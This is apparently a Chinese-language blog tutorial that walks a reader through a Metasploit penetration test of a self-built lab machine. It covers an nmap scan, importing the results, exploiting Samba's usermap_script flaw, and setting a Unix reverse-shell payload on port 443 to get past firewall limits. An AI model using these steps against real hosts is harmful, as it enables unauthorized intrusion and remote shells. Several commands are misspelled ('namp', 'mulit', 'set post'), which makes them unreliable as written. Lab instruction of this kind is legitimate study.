1、啟動Metasploit
聲明:本次滲透測試的主機是我自己在自己的攻擊主機上搭建的另一個操作系統,為了真實性設置了常見的IP地址,如有重合但絕對不是任何實體公司或者單位的IP地址。
所以不承擔任何法律責任 轉載請注明出處
使用命令msfconsole 啟動的時候需要啟動兩次,不然Postgres SQL數據庫無法加載成功,導致 Metasploit Services無法啟動,或者使用 msfgui啟動界面形式的Metasploit,但是需要提前安裝,另一個命令是 msfcli(command line-based) ,建議使用的時候直接采用傳統的方式啟用,這樣其配置的數據庫和服務才會啟動
2、使用namp掃描偵查的地址范圍,將生成的報告導入到Metasploit中進一步做處理。namp掃描的時間可能會很長。
3、掃描完 之后將生成的數據 導入到Metasploit中 使用命令 db_import my.xml,
或者使用一個主機 同時導入nmap掃描的數據 db_nmap -n -A
查詢服務
查詢漏洞
使用一個漏洞,查詢這個漏洞需要的攻擊載荷,根據攻擊載荷我們提供需要的參數。
查詢顯示更多的有效載荷(因為一個漏洞可以運行多個載荷,所以可以替換不同的有效載荷)
設置要載入的有效載荷
一旦有效攻擊載荷設置好之后再次查看一下確定設置的載荷是否成功設置
輸入exploit 執行漏洞利用
現在把之前的測試漏洞命令總結一下:
第一步: namp 掃描IP地址范圍主機 namp -n -oX my.xml 172.168.189.0/24
第二步:導入namp掃描的數據結果 db_import my.xml
第三步 :查看遠程主機上運行的服務 service
補充一點(這里可以查詢單個IP的主機 同時導入 namp的信息) db_namp -n -A 172.16.189.131
第四步:查詢服務是否存在可以利用的漏洞信息 search samba(服務名) type:exploit platform:unix
第五步:利用漏洞 use exploit/mulit/samba/usermap_script
第六步:查詢需要加載的配置參數和載荷 show options
第七步:查詢需要漏洞的相對應的載荷 show payloads
第八步:設置載荷 set payload cmd/unix/reverse(載荷信息)
補充(有的攻擊載荷需要自己的攻擊主機的信息,需要自己添加)除此之外,我要說明一下這里被攻擊的遠程主機端口的設置;一般來說端口設置要避免遠程端限制,443端口,443端口一般設置限制,該端口通常保留SSL流量,可以繞開端口部署的一些設置。
第九步:再次查看一下 加載的有效載荷 是否已經設置好 show options
第十步:設置RHost LHost 以極端口號 set RHOST 192.168.1.1 set post 443
第十一步:執行 exploit